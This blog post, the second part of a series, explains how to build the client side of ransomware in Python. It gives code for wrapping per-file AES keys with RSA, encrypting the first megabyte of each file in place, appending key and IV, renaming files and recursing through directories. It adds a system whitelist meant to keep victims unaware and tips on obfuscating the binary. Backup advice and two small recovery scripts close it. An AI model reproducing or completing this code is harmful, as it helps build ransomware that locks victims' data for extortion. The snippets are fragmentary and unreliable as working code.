In part 1 (https://securityshenaningans.medium.com/architecture-of-a-ransomware-1-2-1b9fee757fcb) we explained the key concepts needed to understand how efficient ransomware works. In this part, we’ll illustrate a couple of these concepts with some Python code. We’ll also go into basic usage of the pycryptodome Python library for encryption. I won’t be publishing the full source code since I don’t want to help script kiddies with their criminal careers. The purpose of this article is only to share knowledge about ransomware, and it shouldn’t be used for malicious activities.
There are multiple open source ransomware projects available, and when reading about ransomware development, I came across a great one called GonnaCry, written by Tarcísio Marinho. The code is very clear and I highly recommend you check it out.
His ransomware contains all the code for the “management side”. He actually coded the server on the attacking side which will manage the decryption keys, and communicate with the infected client, as well as a wallpaper changer.
I didn’t want to get into this aspect since I wrote all my code to learn how ransomware works, and every strain of real-life ransomware handles this side of things differently. You might have an automated service that registers payments and sends decryption keys. You might have a Tor email address and interact with the victim directly. You might even have a system that allows the client to submit a couple of sample files to verify that you can decrypt them. Whatever you have, this varies with each campaign, so coding this part wasn’t in my scope. I focused mainly on the client infection side.
Language of choice
I chose Python for a couple of reasons. The main one is that it’s really easy to read and understand.
It can also be cross-platform as long as you avoid using OS-specific instructions (such as the ones called with os.system). It’s also fast, and has libraries for most of the encryption operations we need to perform. Lastly, it allows you to obfuscate the compiled code, which we’ll do to make reverse engineering of our final binary harder.
When evaluating Python libraries, you might find multiple imports that do the same thing. It’s always a prudent approach to research each one and choose the most used one, especially when it involves a fast-changing topic such as cryptography. You don’t want your ransomware to be decrypted just because you used an outdated library, or even worse, you developed your own encryption schemes, just as Lockcrypt did (don’t do this). We’ll be using two known Python libraries: pycryptodome, and secrets.
Note: In practice, you have wrappers that do the combined asymmetric + symmetric encryption for you (such as asymcrypt). I will however be using straight pycryptodome and creating each function to better illustrate the concepts.
Summary of necessary functions
- generate32ByteKey(): generates a random 32-byte key. There are multiple ways to do this. You could grab a string from /dev/urandom and sha256sum it, but this would be Linux-dependent, and we wanted to do this cross-platform, so we’ll use Python’s secrets library. This can be done with secrets.token_hex(32).
- rsaEncryptSecret(string, publicKey): this will encrypt a secret asymmetrically with a public key (so that it can only be decrypted with the private key). This will allow us to encrypt the symmetric key generated for each file with our publicKey. The client will need our privateKey to decrypt each file’s symmetric key, and then decrypt each file with its own symmetric key.
- rsaDecryptSecret(secret, privateKey): this will decrypt an encrypted symmetric key with a private asymmetric key.
- symEncryptFile(publicKey, file): this function is the most complicated one, as it will have the encryption logic inside it. It’ll be further explained below, but as its name suggests, it’s used to encrypt the files.
- symDecryptFile(privateKey, file): this decrypts a file.
- symEncryptDirectory(publicKey, dir): this function will receive a directory as a parameter and travel it recursively to get all the files inside it. After that it will call symEncryptFile with the publicKey.
- symDecryptDirectory(privateKey, dir): similar to symEncryptDirectory, but the other way around…
This will encrypt a secret key with RSA. Textbook RSA is deterministic, so we’ll be using Optimal Asymmetric Encryption Padding (OAEP for short), a padding scheme that improves on basic RSA by adding randomness before the trapdoor one-way permutation is applied. Remember that when using RSA with OAEP, the resulting ciphertext is the same length as the modulus, which in bytes is the key size / 8. We’re using 2048-bit RSA, so the resulting ciphertext should be 256 bytes.
Here’s a simple code snippet to achieve this.
def rsaEncryptSecret(string, publicKey):
public_key = get_key(publicKey, None)
# Create the cipher object
cipher_rsa = PKCS1_OAEP.new(public_key)
# We need to encode the string to work with bytes instead of chars
bytestrings = str.encode(string)
cipher_text = cipher_rsa.encrypt(bytestrings)
#At this point the cipher_text should be 256 bytes in length
# We'll base64 encode it for convenience
# Remember that a base64 string needs to be divisible by 3, so 256 bytes will become 258 with padding
This will decrypt a ciphertext with a provided private key.
def rsaDecryptSecret(string, privateKey):
# We firts import the private Key
private_key = get_key(privateKey, None)
# Decode the base64 encoded string
base64DecodedSecret = base64.b64decode(string)
# create the cipher object
cipher_rsa = PKCS1_OAEP.new(private_key)
# Decrypt the content
decryptedBytestrings = cipher_rsa.decrypt(base64DecodedSecret)
# Remember to convert the decoded cipher from bytes to string
decryptedSecret = decryptedBytestrings.decode()
This will be the main encryption function. This is how it’ll work:
1. Call the function with a publicKey and a file path as parameters
def symEncryptFile(publicKey, file):
2. Generate a random key for this specific file
key = generateKey()
3. Encrypt the random key with the publicKey.
encriptedKey = rsaEncryptSecret(key, publicKey)
4. Define an encryption size (n bytes) for the file. In this example we’ll use 1MB.
buffer_size = 1048576
5. Check that the file isn’t already encrypted, and if it is, ignore it.
if file.endswith("." + cryptoName):
print('File is already encrypted, skipping')
6. Encrypt the first n bytes of the file and overwrite its content.
# Open the input and output files
input_file = open(file, 'r+b')
print("Encrypting file: "+ file)
output_file = open(file + '.' + cryptoName, 'w+b')# Create the cipher object and encrypt the data
cipher_encrypt = AES.new(key, AES.MODE_CFB)# Encrypt file first
buffer = input_file.read(buffer_size)
ciphered_bytes = cipher_encrypt.encrypt(buffer)input_file.seek(0)
7. Append the encrypted random key to the end of the file.
8. Append the AES IV (initialization vector) to the end of the file.
9. Rename the file to identify it.
os.rename(file, file + "." + cryptoName)
Note how we didn’t need to copy the full file, we just used the seek() method over the file object to navigate the bytes and make the process as quick as possible. This will also be used in the decryption function.
Also note that since we’re writing both the AES IV and the encrypted key in the encrypted file, we don’t need any kind of txt file with a track of each encrypted file. The victim can just send us any file, and as long as we have the private key used for that specific binary, we’ll be able to decrypt it.
This will be the main decryption function. This is how it’ll work:
1. Call the function with a privateKey and a file path as parameters
def symDecryptFile(privateKey, file):
2. Define a decryption size (n bytes) for the file (equal to the one used in the encryption). In our example we used 1MB.
buffer_size = 1048576
3. Verify that the file is encrypted (with its extension).
if file.endswith("." + cryptoName):
out_filename = file[:-(len(cryptoName) + 1)]
print("Decrypting file: " + file)
print('File is not encrypted')
4. Open the file and read the AES IV (the last 16 bytes).
input_file = open(file, 'r+b')# Read in the iv
iv = input_file.read(16)
5. Read the encrypted decryption key. This will be
# we move the pointer to 274 bytes before the end of file
# (258 bytes of the encryption key + 16 of the AES IV)
# And we read the 258 bytes of the key
secret = input_file.read(258)
6. Decrypt the encrypted key with the provided private key
key = rsaDecryptSecret(cert, secret)
7. Decrypt the aes-encrypted buffer size we defined before, and write it to the beginning of the file
# Create the cipher object
cipher_encrypt = AES.new(privateKey, AES.MODE_CFB, iv=iv)
# Read the encrypted header
buffer = input_file.read(buffer_size)
# Decrypt the header with the key
decrypted_bytes = cipher_encrypt.decrypt(buffer)
# Write the decrypted text on the same file
8. Delete the iv + encryption key from the end of the file and rename it.
# Delete the last 274 bytes from the IV + key.
# Rename the file to delete the encrypted extension
Having all these functions, you can create a single binary that lets you either encrypt or decrypt your folder of choice. If you correctly coded the symEncryptDirectory / symDecryptDirectory functions, you can just pick either the encryption or the decryption of a parameter folder/file and just pass a .pem file. You would have something similar to this on the binary before the main call.
parser = argparse.ArgumentParser()parser.add_argument("--dest", "-d", help="File or directory to encrypt/decrypt", dest="destination", default="none", required=True)parser.add_argument("--action", "-a", help="Action (encrypt/decrypt)", dest="action", required=True)
parser.add_argument("--pem","-p", help="Public/Private key", dest="key", required=True)
Aside from the obvious error validation missing (check if the “encrypt” action has a public key passed as a parameter, the “decrypt” has a private one, etc…), you’ll have to define a “whitelist” of files/folders for each operating system. You’ll need to do this in order to leave the computer “usable” but encrypted. If you just start encrypting every file on sight you’ll probably:
1. Make the computer unusable for the user, who’ll realize something’s wrong
2. After encrypting everything, the system won’t boot and the user won’t know that he’s been hit by ransomware.
Just to give you an example, in Linux the whitelist would be something similar to this:
whitelist = ["/etc/ssh", "/etc/pam.d", "/etc/security/", "/boot", "/run", "/usr", "/snap", "/var", "/sys", "/proc", "/dev", "/bin", "/sbin", "/lib", "passwd", "shadow", "known_hosts", "sshd_config", "/home/sec/.viminfo", '/etc/crontab', "/etc/default/locale", "/etc/environment"]
You’ll probably want to pack the .py script with all of its dependencies and bundle it into a single executable. I’m not going to show a step by step, but you can look into pyarmor and pyinstaller. Also, depending on the type of obfuscation you want to use (and the type of binary), Nuitka can be of great help.
Other flavours of ransomware (MBR encryption)
There’s another flavour of ransomware that we didn’t touch on: the kind that infects the Master Boot Record of your drive. This, in turn, allows it to run a payload which encrypts the filesystem’s NTFS file tables, rendering the disk unusable. This approach is very quick since the malware only needs to encrypt a small portion of data. The Petya ransomware is an excellent example of this design. It has three main disadvantages:
The first is that even when the OS is left unbootable, you can still recover your files with forensic analysis. They are not deleted, they are just de-referenced in the file table. Even if the malware starts an encryption routine for the raw data after rebooting the computer, if the victim just shuts down the computer and takes the disk out, the files should be recoverable with some forensic analysis.
The second disadvantage is that most modern operating systems no longer use MBR, having migrated to GPT (GUID Partition Table).
The third disadvantage is that it is heavily filesystem-dependent, and it would need to be modified to handle other filesystem types which do not behave like NTFS (think EXT3/EXT4, ZFS and so on).
This approach requires a lot more low-level technical concepts and I didn’t want to extend this post that much. Also, this methodology is not the most frequently used, and my main intent writing this article was to make readers better understand “common” ransomware.
Conclusion / General Advice
Aside from the obvious frequent recommendations that you should be aware of (don’t open attachments from unknown sources, keep your infrastructure updated, run anti-malware software, etc…), the main prevention technique I can recommend is backup, backup and backup… You will hear a lot of advice on how to prevent an attack, but in my opinion, the best is to always assume that you’ll eventually get infected and have an offline backup of your data.
Even if you’re 100% trained to recognize malicious vectors, one of your organization’s users might not be, and that’s all it takes to encrypt all the mapped shared drives.
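An offline backup only helps if it is complete and intact, so it is worth checking it from time to time. Here is a minimal sketch of one way to do that, using only the Python standard library: it builds a SHA-256 manifest of a folder and compares it against the manifest of the backup copy. The function names build_manifest and diff_manifests are made up for this illustration and are not part of any tool mentioned in this article.

```python
import hashlib
from pathlib import Path


def build_manifest(root):
    """Return {relative_path: sha256_hex} for every regular file under root."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256()
            with path.open("rb") as handle:
                # Hash in 1MB chunks so large files don't need to fit in memory
                for chunk in iter(lambda: handle.read(1024 * 1024), b""):
                    digest.update(chunk)
            manifest[path.relative_to(root).as_posix()] = digest.hexdigest()
    return manifest


def diff_manifests(source, backup):
    """Return (missing, changed): files absent from the backup, and files whose hash differs."""
    missing = sorted(set(source) - set(backup))
    changed = sorted(p for p in source if p in backup and source[p] != backup[p])
    return missing, changed
```

You would run build_manifest over both the live folder and the backup and pass the results to diff_manifests. A sudden wave of "changed" files that you didn’t edit yourself is also a decent hint that something is rewriting your data.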
Lastly, one thing that I haven’t seen anybody recommend: if you get infected, and the encrypted files don’t need to be recovered right away (family pictures, videos, etc…), try to keep a copy of the encrypted files. Sometimes the malware developers either retire (Shade, TeslaCrypt, HildaCrypt), or get arrested (CoinVault), or even publish the keys of their competitors (Petya vs Chimera), and in all these situations the decryption keys might get published. You might get lucky and end up recovering your files a couple of months later.
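Keeping that copy can be as simple as the sketch below, which copies every file carrying the ransomware’s extension into a separate folder while preserving the directory layout. The function name preserve_encrypted_files and the ".locked" extension in the usage note are placeholders chosen for this example; use whatever extension your files actually ended up with, and point the archive at a drive outside the affected folder.

```python
import shutil
from pathlib import Path


def preserve_encrypted_files(source_dir, archive_dir, extension):
    """Copy files ending in `extension` from source_dir into archive_dir.

    The relative directory layout is preserved. Returns the list of copied paths.
    archive_dir should live outside source_dir (ideally on another drive).
    """
    source_dir = Path(source_dir)
    archive_dir = Path(archive_dir)
    copied = []
    for path in sorted(source_dir.rglob("*" + extension)):
        if not path.is_file():
            continue
        target = archive_dir / path.relative_to(source_dir)
        target.parent.mkdir(parents=True, exist_ok=True)
        # copy2 keeps timestamps, which can help when matching files to a decryptor later
        shutil.copy2(path, target)
        copied.append(target)
    return copied
```

For example, preserve_encrypted_files("/home/user", "/mnt/usb/encrypted_copy", ".locked") would set aside everything with that extension. The originals are left untouched.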
That’s all for this post. I hope it was helpful, and that you now have better tools to respond to your next ransomware encounter!